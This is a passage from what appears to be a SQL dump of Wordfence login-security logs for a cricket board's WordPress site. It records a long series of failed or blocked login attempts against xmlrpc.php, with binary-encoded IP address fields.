Firefox/62.0','loginFailValidUsername',NULL,NULL),(645,0.000000,1624503202.860603,'\0\0\0\0\0\0\0\0\0\0��-��#',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(646,0.000000,1624503286.089282,'\0\0\0\0\0\0\0\0\0\0��j��',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(647,0.000000,1624503342.675385,'\0\0\0\0\0\0\0\0\0\0����9d',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(648,0.000000,1624503422.811721,'\0\0\0\0\0\0\0\0\0\0���E4�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(649,0.000000,1624503503.027282,'\0\0\0\0\0\0\0\0\0\0��Xcڌ',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(650,0.000000,1624503658.066847,'\0\0\0\0\0\0\0\0\0\0��co�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(651,0.000000,1624503739.563074,'\0\0\0\0\0\0\0\0\0\0���0Z�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(652,0.000000,1624503978.726628,'\0\0\0\0\0\0\0\0\0\0����w�',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(653,0.000000,1624504320.863339,'\0\0\0\0\0\0\0\0\0\0��2ta3',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(654,0.000000,1624504443.273773,'\0\0\0\0\0\0\0\0\0\0����2<',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(655,0.000000,1624504523.120566,'\0\0\0\0\0\0\0\0\0\0����(',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(656,0.000000,1624504594.114145,'\0\0\0\0\0\0\0\0\0\0���y��',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(657,0.000000,1624504678.055196,'\0\0\0\0\0\0\0\0\0\0���H�D',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(658,0.000000,1624504753.428929,'\0\0\0\0\0\0\0\0\0\0��%:0�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(659,0.000000,1624504907.590725,'\0\0\0\0\0\0\0\0\0\0��F#ŕ',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(660,0.000000,1624504997.065878,'\0\0\0\0\0\0\0\0\0\0��’)d',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(661,0.000000,1624505071.330741,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(662,0.000000,1624505222.057373,'\0\0\0\0\0\0\0\0\0\0���y��',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(663,0.000000,1624505289.719636,'\0\0\0\0\0\0\0\0\0\0���H@a',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(664,0.000000,1624505391.123777,'\0\0\0\0\0\0\0\0\0\0����N�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(665,0.000000,1624505441.424410,'\0\0\0\0\0\0\0\0\0\0���Dx1',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(666,0.000000,1624505620.518935,'\0\0\0\0\0\0\0\0\0\0����B',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(667,0.000000,1624505851.722935,'\0\0\0\0\0\0\0\0\0\0����\'',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(668,0.000000,1624505993.027833,'\0\0\0\0\0\0\0\0\0\0���&V�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(669,0.000000,1624506160.961287,'\0\0\0\0\0\0\0\0\0\0���b�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(670,0.000000,1624506670.776490,'\0\0\0\0\0\0\0\0\0\0���ɷC',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(671,0.000000,1624506707.454921,'\0\0\0\0\0\0\0\0\0\0��-O#(',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(672,0.000000,1624506790.630127,'\0\0\0\0\0\0\0\0\0\0����f',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(673,0.000000,1624506950.421219,'\0\0\0\0\0\0\0\0\0\0���i�9',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(674,0.000000,1624506999.624209,'\0\0\0\0\0\0\0\0\0\0���#p�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(675,0.000000,1624507182.674341,'\0\0\0\0\0\0\0\0\0\0��Xcڌ',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(676,0.000000,1624507595.973565,'\0\0\0\0\0\0\0\0\0\0����2<',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(677,0.000000,1624507748.698078,'\0\0\0\0\0\0\0\0\0\0��\"�F',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(678,0.000000,1624507835.406680,'\0\0\0\0\0\0\0\0\0\0����ɢ',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(679,0.000000,1624507910.772909,'\0\0\0\0\0\0\0\0\0\0���E4�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(680,0.000000,1624508329.296427,'\0\0\0\0\0\0\0\0\0\0���?�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(681,0.000000,1624508624.604987,'\0\0\0\0\0\0\0\0\0\0���X�|',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(682,0.000000,1624508724.780920,'\0\0\0\0\0\0\0\0\0\0��-��#',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(683,0.000000,1624508865.518291,'\0\0\0\0\0\0\0\0\0\0���i�9',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(684,0.000000,1624508932.932819,'\0\0\0\0\0\0\0\0\0\0���n��',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(685,0.000000,1624509327.392848,'\0\0\0\0\0\0\0\0\0\0���Dx1',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(686,0.000000,1624509408.131572,'\0\0\0\0\0\0\0\0\0\0���찍',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(687,0.000000,1624509415.101501,'\0\0\0\0\0\0\0\0\0\0���0Z�',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(688,0.000000,1624509506.767630,'\0\0\0\0\0\0\0\0\0\0����\'',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(689,0.000000,1624509653.375006,'\0\0\0\0\0\0\0\0\0\0��\0',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(690,0.000000,1624509733.803910,'\0\0\0\0\0\0\0\0\0\0����ɢ',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(691,0.000000,1624509805.933437,'\0\0\0\0\0\0\0\0\0\0��V?F',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(692,0.000000,1624510013.850656,'\0\0\0\0\0\0\0\0\0\0��/\\�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(693,0.000000,1624510148.252750,'\0\0\0\0\0\0\0\0\0\0���YY�',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(694,0.000000,1624510360.650846,'\0\0\0\0\0\0\0\0\0\0��Xcڌ',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(695,0.000000,1624510447.487483,'\0\0\0\0\0\0\0\0\0\0���H@a',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(696,0.000000,1624510624.357419,'\0\0\0\0\0\0\0\0\0\0��\'a�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(697,0.000000,1624510687.750642,'\0\0\0\0\0\0\0\0\0\0���&V�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(698,0.000000,1624510755.415334,'\0\0\0\0\0\0\0\0\0\0��%:0�',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(699,0.000000,1624510838.913381,'\0\0\0\0\0\0\0\0\0\0��@�5?',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(700,0.000000,1624510862.638164,'\0\0\0\0\0\0\0\0\0\0��-��#',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(701,0.000000,1624510960.306188,'\0\0\0\0\0\0\0\0\0\0��-��#',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(702,0.000000,1624511331.908863,'\0\0\0\0\0\0\0\0\0\0���FzC',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(703,0.000000,1624511502.465828,'\0\0\0\0\0\0\0\0\0\0��co�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(704,0.000000,1624511581.994176,'\0\0\0\0\0\0\0\0\0\0���c?',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(705,0.000000,1624511663.475793,'\0\0\0\0\0\0\0\0\0\0���H@a',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(706,0.000000,1624512078.736466,'\0\0\0\0\0\0\0\0\0\0�����;',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(707,0.000000,1624512160.067473,'\0\0\0\0\0\0\0\0\0\0����w�',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(708,0.000000,1624512227.274610,'\0\0\0\0\0\0\0\0\0\0��Xc�f',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(709,0.000000,1624512472.734147,'\0\0\0\0\0\0\0\0\0\0���X�|',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(710,0.000000,1624512554.839269,'\0\0\0\0\0\0\0\0\0\0��6$�t',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(711,0.000000,1624512709.178636,'\0\0\0\0\0\0\0\0\0\0���ɧ�',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(712,0.000000,1624512882.161551,'\0\0\0\0\0\0\0\0\0\0�����&',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(713,0.000000,1624512962.203881,'\0\0\0\0\0\0\0\0\0\0��2ta3',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(714,0.000000,1624513286.073217,'\0\0\0\0\0\0\0\0\0\0���c?',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(715,0.000000,1624513690.099302,'\0\0\0\0\0\0\0\0\0\0���X�|',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(716,0.000000,1624513787.226332,'\0\0\0\0\0\0\0\0\0\0����B',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(717,0.000000,1624513878.308965,'\0\0\0\0\0\0\0\0\0\0��-7<n',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(718,0.000000,1624514118.325907,'\0\0\0\0\0\0\0\0\0\0��*Š',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(719,0.000000,1624514245.894318,'\0\0\0\0\0\0\0\0\0\0����w�',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(720,0.000000,1624514440.165435,'\0\0\0\0\0\0\0\0\0\0���ń�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(721,0.000000,1624514527.205686,'\0\0\0\0\0\0\0\0\0\0���\\z�',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(722,0.000000,1624514598.111105,'\0\0\0\0\0\0\0\0\0\0��F#ŕ',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(723,0.000000,1624515117.856152,'\0\0\0\0\0\0\0\0\0\0����B',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(724,0.000000,1624515380.001182,'\0\0\0\0\0\0\0\0\0\0����e�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(725,0.000000,1624515569.818612,'\0\0\0\0\0\0\0\0\0\0���8�T',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(726,0.000000,1624515669.418628,'\0\0\0\0\0\0\0\0\0\0����2<',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(727,0.000000,1624515863.869986,'\0\0\0\0\0\0\0\0\0\0��-7<n',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(728,0.000000,1624516001.450984,'\0\0\0\0\0\0\0\0\0\0���&V�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(729,0.000000,1624516085.073617,'\0\0\0\0\0\0\0\0\0\0����ɢ',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(730,0.000000,1624516246.118221,'\0\0\0\0\0\0\0\0\0\0��>���',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(731,0.000000,1624516656.156688,'\0\0\0\0\0\0\0\0\0\0��co�',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(732,0.000000,1624516742.172559,'\0\0\0\0\0\0\0\0\0\0���8�T',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(733,0.000000,1624516837.147740,'\0\0\0\0\0\0\0\0\0\0����}�',0,200,0,1,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(734,0.000000,1624516914.157466,'\0\0\0\0\0\0\0\0\0\0���;��',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(735,0.000000,1624516930.336381,'\0\0\0\0\0\0\0\0\0\0��=�F�',0,200,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(736,0.000000,1624517145.739109,'\0\0\0\0\0\0\0\0\0\0��F#ŕ',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(737,0.000000,1624517245.269814,'\0\0\0\0\0\0\0\0\0\0���G�R',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(738,0.000000,1624517393.967862,'\0\0\0\0\0\0\0\0\0\0���&V�',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(739,0.000000,1624517541.198572,'\0\0\0\0\0\0\0\0\0\0��-��#',0,503,0,0,0,'https://yorkshirecricketboard.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 